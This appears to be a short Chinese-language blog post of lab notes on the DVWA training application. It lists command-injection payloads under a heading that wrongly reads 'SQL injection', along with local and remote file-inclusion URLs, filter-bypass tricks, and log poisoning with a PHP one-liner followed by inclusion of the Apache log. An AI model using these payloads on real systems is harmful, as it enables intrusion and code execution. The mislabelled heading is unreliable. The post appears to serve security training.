DVWA

SQL注入

low  127.0.0.1 | whoami

medium  127.0.0.1| whoami  由于源码中会过滤‘ |’,所以将空格去掉即可

 

 

 

文件包含

low

本地payload  http://127.0.0.1/DVWA/vulnerabilities/fi/?page=../../../123.txt

         查看网页元素,找到cookies,在蚁剑中进行配置

远程payload  http://192.168.1.168/dvwa/vulnerabilities/fi/?page=http://192.168.1.168/123.txt

medium

因为源码中会将../删除,所以将路径中的../改为....//即可

high

http://192.168.1.168/dvwa/vulnerabilities/fi/?page=file://C:\phpStudy\PHPTutorial\WWW\123.txt

因为源码中要求文件头为file,file:\\是用来寻找文件的命令

burp抓包传入一句话<?php phpinfo();?>

这样日志里记录的一句话就不会被url编码

http://192.168.1.120/dvwa/vulnerabilities/fi/?page=file:\\..\..\..\..\..\Apache\logs\access.log

上一篇:(九)DVWA之SQL Injection--SQLMap&Fiddler测试(High)


下一篇:关于DVWA踩坑